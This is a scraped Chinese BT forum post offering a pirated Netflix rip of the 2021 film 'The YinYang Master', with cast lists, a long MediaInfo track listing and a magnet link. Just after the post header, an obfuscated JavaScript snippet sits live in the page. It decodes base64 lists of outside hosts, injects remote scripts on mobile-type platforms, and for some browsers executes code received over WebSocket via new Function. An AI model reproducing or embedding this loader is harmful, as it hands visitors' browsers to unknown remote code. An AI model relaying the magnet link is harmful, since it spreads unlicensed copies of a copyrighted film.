侍神令[国英多音轨/简繁字幕].The.YinYang.Master.2021.Netflix.WEB-DL.1080p.x264.DDP5.1 5.05GB

版主小s 1月前 213

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 侍神令 / 阴阳师 / 阴阳师电影版 / The YinYang Master
◎年  代 2021
◎产  地 中国大陆
◎类  别 奇幻
◎语  言 汉语普通话
◎上映日期 2021-02-12(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt12151820/
◎豆瓣评分 5.5/10 (158127人评价)
◎豆瓣链接 https://movie.douban.com/subject/26935283/
◎片  长 120分钟
◎导  演 李蔚然 Weiran Li (id:1313669)
◎编  剧 张家鲁 Chia-lu Chang (id:1274308)
       翦以玟 Even Jian (id:1398993)
       章笛沙 Disha Zhang (id:1335266)
◎演  员 陈坤 Kun Chen (id:1053618)
       周迅 Xun Zhou (id:1027798)
       陈伟霆 William Chan (id:1275970)
       屈楚萧 Chuxiao Qu (id:1359081)
       王丽坤 Likun Wang (id:1313574)
       沈月 Yue Shen (id:1374420)
       王紫璇 Zixuan Wang (id:1348484)
       王悦伊 Yueyi Wang (id:1386366)
       孙红雷 Honglei Sun (id:1053581)
       艾米 Aimee (id:1396876)
       储镒恬 Cristian Chu (id:1455062)
       李逸男 Yinan Li (id:1378591)
       张子贤 Zixian Zhang (id:1374201)
       伊然 Ran Yi (id:1416377)
       柳文欢 Wenhuan Liu (id:1406672)
       王翔 Xiang Wang (id:1341523)
       吴鑫尊 Xinzun Wu (id:1440028)
       陈馨妍 Xinyan Chen (id:1443059)
       娄清 Tsing Lou (id:1354885)
       白云 Yun Bai (id:1344381)
       何涌生 Yongsheng He (id:1370932)
       刘若谷 Ruogu Liu (id:1371771)
       张双利 Shuangli Zhang (id:1317610)
       彭艺博 Yibo Peng (id:1354684)
       陈国富 Kuo-fu Chen (id:1075862)
       张家鲁 Chia-lu Chang (id:1274308)
       杨庭恺 Bernard Yang (id:1443208)
       傅若清 Ruoqing Fu (id:1417588)
       郑志昊 Zhihao Zheng (id:1397531)
       王中磊 Zhonglei Wang (id:1276037)
       朱玮杰 Weijie Zhu (id:1400327)
       陶昆 Kun Tao (id:1354359)
       刘国男 Guonan Liu (id:1428690)
       王中军 Zhongjun Wang (id:1276036)
       王正昱 Zhengyu Wang (id:1428691)
       李澄 Cheng Li (id:1428697)
       李治允 Chiyun Yi (id:1383705)
       焦宏奋 Hongfen Jiao (id:1412277)
       梅林茂 Shigeru Umebayashi (id:1005471)
       周深 Shen Zhou (id:1366895)
       于飞 Fei Yu (id:1445404)
       王博学 Boxue Wang (id:1393735)
       张为傈 Weili Zhang (id:1413408)
       赤冢佳仁 Yoshihito Akatsuka (id:1388354)
       易小雅 Xiaoya Yi (id:1448799)
       佘铁军 Tiejun She (id:1422985)
       杨江 Jiang Yang (id:1351381)
       赵楠 Nan Zhao (id:1325307)
       李智勇 Zhiyong Li (id:1456455)
       贾斯汀·琼斯 Justin Jones (id:1199192)
       李忠志 Chung Chi Li (id:1014763)
       陈志伟 Chi Wai Chan (id:1280415)

◎标  签 阴阳师 / 奇幻 / 游戏改编 / 电影 / 中国大陆 / 魔幻 / 二次元 / 2021

◎简  介
  穿行于人妖两界的阴阳师晴明(陈坤 饰),因与一众妖怪缔结契约,酿成大祸,深陷危机。而与此同时,妖皇势力正卷土重来,一场恶战一触即发。在风云突变、局势动荡的危急时刻,晴明恍然发现,自己人妖混血的身份,竟是这一切灾祸的关键......

◎获奖情况 (共1项)
  第7届豆瓣电影年度榜单 (2020)
  最值得期待的华语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 325269740833247151380553615941715935461 (0xF4B4AC631D91EFE62159DA8F13C8C0E5)

  4. Complete name                            : [email protected]BQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.05 GiB

  8. Duration                                 : 2 h 0 min

  9. Overall bit rate                         : 6 002 kb/s

  10. Encoded date                             : UTC 2021-08-01 06:20:04

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 4 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 4 frames

  21. Codec ID                                 : V_MPEG4/ISO/AVC

  22. Duration                                 : 2 h 0 min

  23. Bit rate                                 : 4 717 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 16:9

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 8 bits

  32. Scan type                                : Progressive

  33. Bits/(Pixel*Frame)                       : 0.095

  34. Stream size                              : 3.97 GiB (79%)

  35. Default                                  : Yes

  36. Forced                                   : No


  37. Audio #1

  38. ID                                       : 2

  39. Format                                   : E-AC-3

  40. Format/Info                              : Enhanced AC-3

  41. Commercial name                          : Dolby Digital Plus

  42. Codec ID                                 : A_EAC3

  43. Duration                                 : 2 h 0 min

  44. Bit rate mode                            : Constant

  45. Bit rate                                 : 640 kb/s

  46. Channel(s)                               : 6 channels

  47. Channel layout                           : L R C LFE Ls Rs

  48. Sampling rate                            : 48.0 kHz

  49. Frame rate                               : 31.250 FPS (1536 SPF)

  50. Compression mode                         : Lossy

  51. Delay relative to video                  : -83 ms

  52. Stream size                              : 551 MiB (11%)

  53. Title                                    : English

  54. Language                                 : English

  55. Service kind                             : Complete Main

  56. Default                                  : Yes

  57. Forced                                   : No


  58. Audio #2

  59. ID                                       : 3

  60. Format                                   : E-AC-3

  61. Format/Info                              : Enhanced AC-3

  62. Commercial name                          : Dolby Digital Plus

  63. Codec ID                                 : A_EAC3

  64. Duration                                 : 2 h 0 min

  65. Bit rate mode                            : Constant

  66. Bit rate                                 : 640 kb/s

  67. Channel(s)                               : 6 channels

  68. Channel layout                           : L R C LFE Ls Rs

  69. Sampling rate                            : 48.0 kHz

  70. Frame rate                               : 31.250 FPS (1536 SPF)

  71. Compression mode                         : Lossy

  72. Delay relative to video                  : -83 ms

  73. Stream size                              : 551 MiB (11%)

  74. Title                                    : Chinese

  75. Language                                 : Chinese

  76. Service kind                             : Complete Main

  77. Default                                  : Yes

  78. Forced                                   : No


  79. Text #1

  80. ID                                       : 4

  81. Format                                   : UTF-8

  82. Codec ID                                 : S_TEXT/UTF8

  83. Codec ID/Info                            : UTF-8 Plain Text

  84. Duration                                 : 1 h 58 min

  85. Bit rate                                 : 55 b/s

  86. Count of elements                        : 1315

  87. Stream size                              : 48.3 KiB (0%)

  88. Title                                    : ?????????????

  89. Language                                 : Arabic

  90. Default                                  : Yes

  91. Forced                                   : No


  92. Text #2

  93. ID                                       : 5

  94. Format                                   : UTF-8

  95. Codec ID                                 : S_TEXT/UTF8

  96. Codec ID/Info                            : UTF-8 Plain Text

  97. Duration                                 : 1 h 58 min

  98. Bit rate                                 : 36 b/s

  99. Count of elements                        : 1314

  100. Stream size                              : 32.1 KiB (0%)

  101. Title                                    : ?e?tina

  102. Language                                 : Czech

  103. Default                                  : Yes

  104. Forced                                   : No


  105. Text #3

  106. ID                                       : 6

  107. Format                                   : UTF-8

  108. Codec ID                                 : S_TEXT/UTF8

  109. Codec ID/Info                            : UTF-8 Plain Text

  110. Duration                                 : 1 h 58 min

  111. Bit rate                                 : 38 b/s

  112. Count of elements                        : 1302

  113. Stream size                              : 33.9 KiB (0%)

  114. Title                                    : Danish

  115. Language                                 : Danish

  116. Default                                  : Yes

  117. Forced                                   : No


  118. Text #4

  119. ID                                       : 7

  120. Format                                   : UTF-8

  121. Codec ID                                 : S_TEXT/UTF8

  122. Codec ID/Info                            : UTF-8 Plain Text

  123. Duration                                 : 1 h 58 min

  124. Bit rate                                 : 39 b/s

  125. Count of elements                        : 1311

  126. Stream size                              : 34.4 KiB (0%)

  127. Title                                    : German

  128. Language                                 : German

  129. Default                                  : Yes

  130. Forced                                   : No


  131. Text #5

  132. ID                                       : 8

  133. Format                                   : UTF-8

  134. Codec ID                                 : S_TEXT/UTF8

  135. Codec ID/Info                            : UTF-8 Plain Text

  136. Duration                                 : 1 h 58 min

  137. Bit rate                                 : 63 b/s

  138. Count of elements                        : 1314

  139. Stream size                              : 55.7 KiB (0%)

  140. Title                                    : Greek

  141. Language                                 : Greek

  142. Default                                  : Yes

  143. Forced                                   : No


  144. Text #6

  145. ID                                       : 9

  146. Format                                   : UTF-8

  147. Codec ID                                 : S_TEXT/UTF8

  148. Codec ID/Info                            : UTF-8 Plain Text

  149. Duration                                 : 1 h 58 min

  150. Bit rate                                 : 38 b/s

  151. Count of elements                        : 1314

  152. Stream size                              : 33.8 KiB (0%)

  153. Title                                    : English

  154. Language                                 : English

  155. Default                                  : Yes

  156. Forced                                   : No


  157. Text #7

  158. ID                                       : 10

  159. Format                                   : UTF-8

  160. Codec ID                                 : S_TEXT/UTF8

  161. Codec ID/Info                            : UTF-8 Plain Text

  162. Duration                                 : 1 h 58 min

  163. Bit rate                                 : 37 b/s

  164. Count of elements                        : 1166

  165. Stream size                              : 32.3 KiB (0%)

  166. Title                                    : Spanish

  167. Language                                 : Spanish

  168. Default                                  : Yes

  169. Forced                                   : No


  170. Text #8

  171. ID                                       : 11

  172. Format                                   : UTF-8

  173. Codec ID                                 : S_TEXT/UTF8

  174. Codec ID/Info                            : UTF-8 Plain Text

  175. Duration                                 : 1 h 58 min

  176. Bit rate                                 : 36 b/s

  177. Count of elements                        : 1312

  178. Stream size                              : 32.0 KiB (0%)

  179. Title                                    : European?Spanish

  180. Language                                 : Spanish

  181. Default                                  : Yes

  182. Forced                                   : No


  183. Text #9

  184. ID                                       : 12

  185. Format                                   : UTF-8

  186. Codec ID                                 : S_TEXT/UTF8

  187. Codec ID/Info                            : UTF-8 Plain Text

  188. Duration                                 : 1 h 58 min

  189. Bit rate                                 : 38 b/s

  190. Count of elements                        : 1309

  191. Stream size                              : 33.5 KiB (0%)

  192. Title                                    : Finnish

  193. Language                                 : Finnish

  194. Default                                  : Yes

  195. Forced                                   : No


  196. Text #10

  197. ID                                       : 13

  198. Format                                   : UTF-8

  199. Codec ID                                 : S_TEXT/UTF8

  200. Codec ID/Info                            : UTF-8 Plain Text

  201. Duration                                 : 1 h 58 min

  202. Bit rate                                 : 40 b/s

  203. Count of elements                        : 1278

  204. Stream size                              : 35.6 KiB (0%)

  205. Title                                    : French

  206. Language                                 : French

  207. Default                                  : Yes

  208. Forced                                   : No


  209. Text #11

  210. ID                                       : 14

  211. Format                                   : UTF-8

  212. Codec ID                                 : S_TEXT/UTF8

  213. Codec ID/Info                            : UTF-8 Plain Text

  214. Duration                                 : 1 h 58 min

  215. Bit rate                                 : 51 b/s

  216. Count of elements                        : 1315

  217. Stream size                              : 44.8 KiB (0%)

  218. Title                                    : Hebrew

  219. Language                                 : Hebrew

  220. Default                                  : Yes

  221. Forced                                   : No


  222. Text #12

  223. ID                                       : 15

  224. Format                                   : UTF-8

  225. Codec ID                                 : S_TEXT/UTF8

  226. Codec ID/Info                            : UTF-8 Plain Text

  227. Duration                                 : 1 h 58 min

  228. Bit rate                                 : 34 b/s

  229. Count of elements                        : 1313

  230. Stream size                              : 29.7 KiB (0%)

  231. Title                                    : Hungarian

  232. Language                                 : Hungarian

  233. Default                                  : Yes

  234. Forced                                   : No


  235. Text #13

  236. ID                                       : 16

  237. Format                                   : UTF-8

  238. Codec ID                                 : S_TEXT/UTF8

  239. Codec ID/Info                            : UTF-8 Plain Text

  240. Duration                                 : 1 h 58 min

  241. Bit rate                                 : 37 b/s

  242. Count of elements                        : 1241

  243. Stream size                              : 33.0 KiB (0%)

  244. Title                                    : Indonesian

  245. Language                                 : Indonesian

  246. Default                                  : Yes

  247. Forced                                   : No


  248. Text #14

  249. ID                                       : 17

  250. Format                                   : UTF-8

  251. Codec ID                                 : S_TEXT/UTF8

  252. Codec ID/Info                            : UTF-8 Plain Text

  253. Duration                                 : 1 h 58 min

  254. Bit rate                                 : 37 b/s

  255. Count of elements                        : 1310

  256. Stream size                              : 32.3 KiB (0%)

  257. Title                                    : Italian

  258. Language                                 : Italian

  259. Default                                  : Yes

  260. Forced                                   : No


  261. Text #15

  262. ID                                       : 18

  263. Format                                   : UTF-8

  264. Codec ID                                 : S_TEXT/UTF8

  265. Codec ID/Info                            : UTF-8 Plain Text

  266. Duration                                 : 1 h 58 min

  267. Bit rate                                 : 65 b/s

  268. Count of elements                        : 954

  269. Stream size                              : 56.9 KiB (0%)

  270. Title                                    : 日本語

  271. Language                                 : Japanese

  272. Default                                  : Yes

  273. Forced                                   : No


  274. Text #16

  275. ID                                       : 19

  276. Format                                   : UTF-8

  277. Codec ID                                 : S_TEXT/UTF8

  278. Codec ID/Info                            : UTF-8 Plain Text

  279. Duration                                 : 1 h 58 min

  280. Bit rate                                 : 40 b/s

  281. Count of elements                        : 1142

  282. Stream size                              : 35.2 KiB (0%)

  283. Title                                    : ??

  284. Language                                 : Korean

  285. Default                                  : Yes

  286. Forced                                   : No


  287. Text #17

  288. ID                                       : 20

  289. Format                                   : UTF-8

  290. Codec ID                                 : S_TEXT/UTF8

  291. Codec ID/Info                            : UTF-8 Plain Text

  292. Duration                                 : 1 h 58 min

  293. Bit rate                                 : 36 b/s

  294. Count of elements                        : 1223

  295. Stream size                              : 32.2 KiB (0%)

  296. Title                                    : Malay

  297. Language                                 : Malay

  298. Default                                  : Yes

  299. Forced                                   : No


  300. Text #18

  301. ID                                       : 21

  302. Format                                   : UTF-8

  303. Codec ID                                 : S_TEXT/UTF8

  304. Codec ID/Info                            : UTF-8 Plain Text

  305. Duration                                 : 1 h 58 min

  306. Bit rate                                 : 36 b/s

  307. Count of elements                        : 1314

  308. Stream size                              : 31.9 KiB (0%)

  309. Title                                    : Norsk

  310. Language                                 : Norwegian Bokmal

  311. Default                                  : Yes

  312. Forced                                   : No


  313. Text #19

  314. ID                                       : 22

  315. Format                                   : UTF-8

  316. Codec ID                                 : S_TEXT/UTF8

  317. Codec ID/Info                            : UTF-8 Plain Text

  318. Duration                                 : 1 h 58 min

  319. Bit rate                                 : 38 b/s

  320. Count of elements                        : 1309

  321. Stream size                              : 33.5 KiB (0%)

  322. Title                                    : Dutch

  323. Language                                 : Dutch

  324. Default                                  : Yes

  325. Forced                                   : No


  326. Text #20

  327. ID                                       : 23

  328. Format                                   : UTF-8

  329. Codec ID                                 : S_TEXT/UTF8

  330. Codec ID/Info                            : UTF-8 Plain Text

  331. Duration                                 : 1 h 58 min

  332. Bit rate                                 : 35 b/s

  333. Count of elements                        : 1310

  334. Stream size                              : 31.1 KiB (0%)

  335. Title                                    : Polish

  336. Language                                 : Polish

  337. Default                                  : Yes

  338. Forced                                   : No


  339. Text #21

  340. ID                                       : 24

  341. Format                                   : UTF-8

  342. Codec ID                                 : S_TEXT/UTF8

  343. Codec ID/Info                            : UTF-8 Plain Text

  344. Duration                                 : 1 h 58 min

  345. Bit rate                                 : 38 b/s

  346. Count of elements                        : 1314

  347. Stream size                              : 33.6 KiB (0%)

  348. Title                                    : Portuguêse

  349. Language                                 : Portuguese

  350. Default                                  : Yes

  351. Forced                                   : No


  352. Text #22

  353. ID                                       : 25

  354. Format                                   : UTF-8

  355. Codec ID                                 : S_TEXT/UTF8

  356. Codec ID/Info                            : UTF-8 Plain Text

  357. Duration                                 : 1 h 58 min

  358. Bit rate                                 : 35 b/s

  359. Count of elements                        : 1268

  360. Stream size                              : 31.3 KiB (0%)

  361. Title                                    : Português?brasileiro

  362. Language                                 : Portuguese

  363. Default                                  : Yes

  364. Forced                                   : No


  365. Text #23

  366. ID                                       : 26

  367. Format                                   : UTF-8

  368. Codec ID                                 : S_TEXT/UTF8

  369. Codec ID/Info                            : UTF-8 Plain Text

  370. Duration                                 : 1 h 58 min

  371. Bit rate                                 : 39 b/s

  372. Count of elements                        : 1312

  373. Stream size                              : 34.3 KiB (0%)

  374. Title                                    : Roman?

  375. Language                                 : Romanian

  376. Default                                  : Yes

  377. Forced                                   : No


  378. Text #24

  379. ID                                       : 27

  380. Format                                   : UTF-8

  381. Codec ID                                 : S_TEXT/UTF8

  382. Codec ID/Info                            : UTF-8 Plain Text

  383. Duration                                 : 1 h 58 min

  384. Bit rate                                 : 60 b/s

  385. Count of elements                        : 1316

  386. Stream size                              : 52.4 KiB (0%)

  387. Title                                    : русский?язык

  388. Language                                 : Russian

  389. Default                                  : Yes

  390. Forced                                   : No


  391. Text #25

  392. ID                                       : 28

  393. Format                                   : UTF-8

  394. Codec ID                                 : S_TEXT/UTF8

  395. Codec ID/Info                            : UTF-8 Plain Text

  396. Duration                                 : 1 h 58 min

  397. Bit rate                                 : 38 b/s

  398. Count of elements                        : 1315

  399. Stream size                              : 33.6 KiB (0%)

  400. Title                                    : Svenska

  401. Language                                 : Swedish

  402. Default                                  : Yes

  403. Forced                                   : No


  404. Text #26

  405. ID                                       : 29

  406. Format                                   : UTF-8

  407. Codec ID                                 : S_TEXT/UTF8

  408. Codec ID/Info                            : UTF-8 Plain Text

  409. Duration                                 : 1 h 58 min

  410. Bit rate                                 : 83 b/s

  411. Count of elements                        : 1314

  412. Stream size                              : 72.6 KiB (0%)

  413. Title                                    : ???????

  414. Language                                 : Thai

  415. Default                                  : Yes

  416. Forced                                   : No


  417. Text #27

  418. ID                                       : 30

  419. Format                                   : UTF-8

  420. Codec ID                                 : S_TEXT/UTF8

  421. Codec ID/Info                            : UTF-8 Plain Text

  422. Duration                                 : 1 h 58 min

  423. Bit rate                                 : 38 b/s

  424. Count of elements                        : 1315

  425. Stream size                              : 33.8 KiB (0%)

  426. Title                                    : Türk?e

  427. Language                                 : Turkish

  428. Default                                  : Yes

  429. Forced                                   : No


  430. Text #28

  431. ID                                       : 31

  432. Format                                   : UTF-8

  433. Codec ID                                 : S_TEXT/UTF8

  434. Codec ID/Info                            : UTF-8 Plain Text

  435. Duration                                 : 1 h 58 min

  436. Bit rate                                 : 48 b/s

  437. Count of elements                        : 1312

  438. Stream size                              : 42.2 KiB (0%)

  439. Title                                    : Ti?ng?Vi?t

  440. Language                                 : Vietnamese

  441. Default                                  : Yes

  442. Forced                                   : No


  443. Text #29

  444. ID                                       : 32

  445. Format                                   : UTF-8

  446. Codec ID                                 : S_TEXT/UTF8

  447. Codec ID/Info                            : UTF-8 Plain Text

  448. Duration                                 : 1 h 58 min

  449. Bit rate                                 : 27 b/s

  450. Count of elements                        : 1161

  451. Stream size                              : 23.8 KiB (0%)

  452. Title                                    : Simplified?Chinese

  453. Language                                 : Chinese

  454. Default                                  : Yes

  455. Forced                                   : No


  456. Text #30

  457. ID                                       : 33

  458. Format                                   : UTF-8

  459. Codec ID                                 : S_TEXT/UTF8

  460. Codec ID/Info                            : UTF-8 Plain Text

  461. Duration                                 : 1 h 58 min

  462. Bit rate                                 : 27 b/s

  463. Count of elements                        : 1174

  464. Stream size                              : 24.4 KiB (0%)

  465. Title                                    : Traditional?Chinese

  466. Language                                 : Chinese

  467. Default                                  : Yes

  468. Forced                                   : No



TAGS 奇幻

磁力链:
  • magnet:?xt=urn:btih:FDA8D525BEE0166E040FBBF633D153D5B006B733
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回